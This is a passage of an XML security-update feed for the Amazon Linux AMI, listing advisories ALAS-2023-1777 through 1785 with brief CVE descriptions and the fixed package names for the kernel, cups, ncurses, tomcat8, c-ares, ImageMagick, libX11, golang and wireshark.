An issue was found in the Linux kernel's IPv6 TCP connection tracking code, which could lead to high CPU usage with certain traffic patterns.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1206" title="" id="CVE-2023-1206" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.318" release="167.530.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.318-167.530.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1777</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1777: medium priority package update for cups</title><issued date="2023-07-05 21:44:00" /><updated date="2023-07-19 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-34241:
A vulnerability was found in CUPS. This issue occurs due to logging data of freed memory to the logging service AFTER the connection has been closed, when it should have logged the data immediately before the connection closed, resulting in a use-after-free in cupsdAcceptClient() in scheduler/client.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34241" title="" id="CVE-2023-34241" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-debuginfo" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.22.amzn1" epoch="1" 
arch="i686"><filename>Packages/cups-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1778</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1778: important priority package update for ncurses</title><issued date="2023-07-05 21:44:00" /><updated date="2023-07-19 21:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29491:
ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491" title="" id="CVE-2023-29491" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ncurses-term" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-term-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-base" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-base-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-debuginfo" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-debuginfo-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-static" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-static-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-libs" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-libs-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-devel" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-devel-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-devel" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-devel-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-libs" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-libs-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-debuginfo" version="5.7" release="4.20090207.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/ncurses-debuginfo-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-static" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-static-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-base" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-base-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-term" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-term-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-5.7-4.20090207.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1779</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1779: important priority package update for tomcat8</title><issued date="2023-07-05 21:44:00" /><updated date="2023-07-19 21:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28709:
The fix for CVE-2023-24998 was incomplete for Apache Tomcat 11.0.0-M2 to 11.0.0-M4, 10.1.5 to 10.1.7, 9.0.71 to 9.0.73 and 8.5.85 to 8.5.87. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28709" title="" id="CVE-2023-28709" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.89" release="1.93.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.89-1.93.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1780</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1780: medium priority package update for c-ares</title><issued date="2023-07-05 21:44:00" /><updated date="2023-07-19 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4904:
A flaw was found in the c-ares package. The ares_set_sortlist is missing checks about the validity of the input string, which allows a possible arbitrary length stack overflow. This issue may cause a denial of service or a limited impact on confidentiality and integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4904" title="" id="CVE-2022-4904" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="c-ares" version="1.17.2" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-1.17.2-1.10.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-debuginfo-1.17.2-1.10.amzn1.x86_64.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-devel-1.17.2-1.10.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-debuginfo-1.17.2-1.10.amzn1.i686.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-1.17.2-1.10.amzn1.i686.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-devel-1.17.2-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1781</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1781: medium priority package update for ImageMagick</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3428:
The upstream bug report describes this issue as follows:
"A vulnerability was found in ImageMagick <=7.1.1, where heap-based buffer overflow was found in coders/tiff.c."
CVE-2023-3195:
Stack overflow when parsing a malicious TIFF image.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3195" title="" id="CVE-2023-3195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" title="" id="CVE-2023-3428" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1782</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1782: medium priority package update for libX11</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3138:
A vulnerability was found in libX11. The security flaw occurs because the functions in src/InitExt.c in libX11 do not check that the values provided for the Request, Event, or Error IDs are within the bounds of the arrays that those functions write to, using those IDs as array indexes. They trust that they were called with values provided by an Xserver adhering to the bounds specified in the X11 protocol, as all X servers provided by X.Org do. As the protocol only specifies a single byte for these values, an out-of-bounds value provided by a malicious server (or a malicious proxy-in-the-middle) can only overwrite other portions of the Display structure and not write outside the bounds of the Display structure itself, possibly causing the client to crash with this memory corruption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3138" title="" id="CVE-2023-3138" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.15.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.15.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.15.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.15.amzn1.x86_64.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.15.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.15.amzn1.i686.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.15.amzn1.i686.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1783</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1783: important priority package update for kernel</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-35001:
Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace
CVE-2023-3117:
A use-after-free flaw was found in the Netfilter subsystem of the Linux kernel when processing named and anonymous sets in batch requests, which can lead to performing arbitrary reads and writes in kernel memory. This flaw allows a local user with CAP_NET_ADMIN capability to crash or potentially escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3117" title="" id="CVE-2023-3117" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35001" title="" id="CVE-2023-35001" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.320-168.534.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1784</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1784: important priority package update for golang</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29402:
The go command may generate unexpected code at build time when using cgo. This may result in unexpected behavior when running a go program which uses cgo. This may occur when running an untrusted module which contains directories with newline characters in their names. Modules which are retrieved using the go command, i.e. via "go get", are not affected (modules retrieved using GOPATH-mode, i.e. GO111MODULE=off, may be affected).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29402" title="" id="CVE-2023-29402" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.18.6" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.18.6-1.45.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.18.6-1.45.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.18.6" release="1.45.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.18.6-1.45.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.18.6" release="1.45.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.18.6-1.45.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.18.6-1.45.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.18.6" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.18.6-1.45.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.18.6" release="1.45.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.18.6-1.45.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.18.6" release="1.45.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.18.6-1.45.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.18.6-1.45.amzn1.i686.rpm</filename></package><package name="golang" version="1.18.6" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.18.6-1.45.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.45.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-shared-1.18.6-1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1785</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1785: low priority package update for wireshark</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0667:
Due to failure in validating the length provided by an attacker-crafted MSMMS packet, Wireshark version 4.0.5 and prior, in an unusual configuration, is susceptible to a heap-based buffer overflow, and possibly code execution in the context of the process running Wireshark.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0667" title="" id="CVE-2023-0667" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark-devel" version="1.8.10" release="25.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-25.24.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="25.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-25.24.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="25.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-25.24.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="25.24.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-25.24.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="25.24.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-25.24.amzn1.i686.rpm</filename></package><package name="wireshark" version="1.8.10" release="25.24.amzn1" epoch="0" 